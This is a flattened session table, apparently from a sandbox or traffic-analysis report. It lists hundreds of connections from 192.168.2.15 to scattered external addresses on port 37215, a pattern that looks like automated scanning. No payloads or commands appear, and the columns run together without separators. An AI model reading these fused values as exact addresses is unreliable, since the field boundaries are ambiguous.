                                                                            14934192.168.2.1542246197.168.104.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14935192.168.2.1549138197.101.132.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14936192.168.2.1536708197.195.253.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14937192.168.2.1559278197.158.8.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14938192.168.2.1546664197.203.227.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14939192.168.2.1539460197.54.106.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14940192.168.2.1549762197.194.138.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14941192.168.2.1538572197.202.77.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14942192.168.2.1553792197.211.245.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14943192.168.2.1549156197.204.28.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14944192.168.2.1549540197.201.147.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14945192.168.2.1545262197.233.109.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14946192.168.2.1540722197.149.70.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14947192.168.2.1553582197.37.253.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14948192.168.2.1548892197.100.134.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14949192.168.2.1537778197.39.29.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14950192.168.2.1542358197.227.142.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14951192.168.2.1534120197.234.107.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14952192.168.2.1538262197.14.34.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14953192.168.2.1535810197.96.237.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14954192.168.2.1555992197.153.186.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14955192.168.2.1556060197.204.187.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14956192.168.2.1554486197.128.42.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14957192.168.2.1546132197.208.177.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14958192.168.2.1536072197.247.116.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14959192.168.2.1533592197.145.52.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14960192.168.2.1559396197.171.186.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14961192.168.2.1560460197.201.252.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14962192.168.2.1545264197.98.118.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14963192.168.2.1540174197.117.73.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14964192.168.2.1534608197.97.120.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14965192.168.2.1544926197.68.212.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14966192.168.2.1548438197.188.62.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14967192.168.2.1554510197.48.161.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14968192.168.2.1560858197.14.43.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14969192.168.2.1548856197.58.105.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14970192.168.2.1551468197.216.190.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14971192.168.2.1548576197.150.126.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14972192.168.2.1554640197.158.155.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14973192.168.2.1550696197.42.190.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14974192.168.2.1544534197.97.216.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14975192.168.2.1541472197.170.55.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14976192.168.2.1543460197.50.77.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14977192.168.2.1553276197.118.197.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14978192.168.2.1549478197.8.171.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14979192.168.2.1551204197.63.6.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14980192.168.2.1545566197.56.202.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14981192.168.2.1552258197.20.113.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14982192.168.2.1560988197.94.163.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14983192.168.2.1554346197.109.174.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14984192.168.2.1546694197.244.162.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14985192.168.2.1554062197.20.62.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14986192.168.2.1560644197.251.154.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14987192.168.2.1533396197.8.237.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14988192.168.2.1545138197.214.195.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14989192.168.2.1556436197.231.52.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14990192.168.2.1533582197.237.113.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14991192.168.2.1542860197.140.69.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14992192.168.2.1542358197.66.78.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14993192.168.2.1553080197.18.191.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14994192.168.2.1549654197.69.1.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14995192.168.2.1544786197.251.83.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14996192.168.2.1538188197.138.29.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14997192.168.2.1555718197.135.155.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14998192.168.2.1551300197.200.132.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14999192.168.2.1539492197.66.73.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15000192.168.2.1551778197.240.5.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15001192.168.2.1540590197.59.85.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15002192.168.2.1551674197.113.4.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15003192.168.2.1539248197.106.146.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15004192.168.2.1560714197.219.85.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15005192.168.2.1537870197.41.242.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15006192.168.2.1540442197.206.73.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15007192.168.2.1533612197.147.40.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15008192.168.2.1555934197.98.176.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15009192.168.2.1545500197.144.33.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15010192.168.2.1547220197.61.172.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15011192.168.2.1545670197.171.206.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15012192.168.2.1549070197.150.154.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15013192.168.2.1555488197.168.238.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15014192.168.2.1535432197.140.221.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15015192.168.2.1553638197.19.11.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15016192.168.2.1554254197.130.126.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15017192.168.2.1558286197.19.175.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15018192.168.2.1559166197.222.206.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15019192.168.2.1536914197.2.55.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15020192.168.2.1551650197.58.236.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15021192.168.2.1557474197.234.52.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15022192.168.2.1538762197.226.1.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15023192.168.2.1545148197.140.88.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15024192.168.2.1556768197.64.20.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15025192.168.2.1542378197.18.112.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15026192.168.2.1551566197.8.244.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15027192.168.2.1537876197.225.9.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15028192.168.2.1555062197.113.126.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15029192.168.2.1559554197.201.196.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15030192.168.2.1550154197.159.241.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15031192.168.2.1552686197.139.240.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15032192.168.2.1550326197.69.209.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15033192.168.2.1536538197.210.49.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15034192.168.2.1553364197.164.26.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15035192.168.2.1547164197.174.236.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15036192.168.2.1532888197.221.102.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15037192.168.2.1545914197.197.209.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15038192.168.2.1549938197.154.237.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15039192.168.2.1541884197.13.86.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15040192.168.2.1535390197.116.224.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15041192.168.2.1555212197.76.50.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15042192.168.2.1537352197.191.160.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15043192.168.2.1557046197.255.9.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15044192.168.2.1555894197.140.39.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15045192.168.2.1537082197.188.100.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15046192.168.2.1542748197.193.104.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15047192.168.2.1543852197.151.44.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15048192.168.2.1555080197.9.127.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15049192.168.2.1553228197.96.64.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15050192.168.2.1537322197.86.206.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15051192.168.2.1542060197.150.248.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15052192.168.2.1551140197.68.134.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15053192.168.2.1548824197.92.60.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15054192.168.2.1533240197.45.103.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15055192.168.2.1551428197.232.55.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15056192.168.2.1558476197.59.37.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15057192.168.2.1538024197.104.251.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15058192.168.2.1548366197.140.222.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15059192.168.2.1536190197.28.166.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15060192.168.2.1546184197.77.125.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15061192.168.2.1542038197.21.42.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15062192.168.2.1543366197.73.252.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15063192.168.2.1553180197.188.30.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15064192.168.2.1534294197.230.51.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15065192.168.2.1539618197.241.125.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15066192.168.2.1551510197.199.204.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15067192.168.2.1545980197.99.123.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15068192.168.2.1545332197.90.100.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15069192.168.2.1555032197.169.216.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15070192.168.2.1539126197.124.235.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15071192.168.2.1539682197.220.152.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15072192.168.2.1558300197.5.117.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15073192.168.2.1549980197.5.49.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15074192.168.2.1545532197.76.3.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15075192.168.2.1549492197.26.221.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15076192.168.2.1544342197.147.97.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15077192.168.2.1554282197.189.98.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15078192.168.2.1542152197.113.184.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15079192.168.2.1553412197.210.143.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15080192.168.2.1553082197.176.24.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15081192.168.2.1559968197.138.218.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15082192.168.2.1554670197.151.94.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15083192.168.2.1532836197.73.236.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15084192.168.2.1536960197.43.237.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15085192.168.2.1535472197.137.145.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15086192.168.2.1534236197.72.128.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15087192.168.2.1560162197.223.58.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15088192.168.2.1557416197.18.96.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15089192.168.2.1533300197.238.137.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15090192.168.2.1544650197.16.146.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15091192.168.2.1540900197.134.65.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15092192.168.2.1560530197.21.140.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15093192.168.2.1533596197.202.9.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15094192.168.2.1543442197.33.51.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15095192.168.2.1533688197.185.126.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15096192.168.2.1553512197.213.44.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15097192.168.2.1552596197.218.114.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15098192.168.2.1547448197.143.198.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15099192.168.2.1547604197.200.149.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15100192.168.2.1540300197.22.197.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15101192.168.2.1542048197.177.198.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15102192.168.2.1551794197.53.118.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15103192.168.2.1543780197.223.30.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15104192.168.2.1541742197.154.0.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15105192.168.2.1553550197.196.40.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15106192.168.2.1547598197.235.12.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15107192.168.2.1543396197.50.30.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15108192.168.2.1546464197.44.206.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15109192.168.2.1558342197.125.180.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15110192.168.2.1543254197.61.30.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15111192.168.2.1558312197.221.49.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15112192.168.2.1553486197.170.128.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15113192.168.2.1549536197.249.65.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15114192.168.2.1533646197.186.95.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15115192.168.2.154704641.233.150.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15116192.168.2.155986441.242.240.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15117192.168.2.153501841.138.144.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15118192.168.2.155936841.127.235.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15119192.168.2.153864041.146.115.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15120192.168.2.155190841.18.251.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15121192.168.2.155790441.157.226.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15122192.168.2.155636241.0.189.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15123192.168.2.155949641.121.95.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15124192.168.2.154219241.94.1.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15125192.168.2.154107241.107.222.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15126192.168.2.154968641.225.3.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15127192.168.2.154016241.125.112.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15128192.168.2.155032441.28.19.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15129192.168.2.153981041.116.110.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15130192.168.2.154439841.251.34.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15131192.168.2.154180441.63.119.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15132192.168.2.153870841.48.223.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15133192.168.2.154711441.211.91.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15134192.168.2.153705241.154.150.20237215
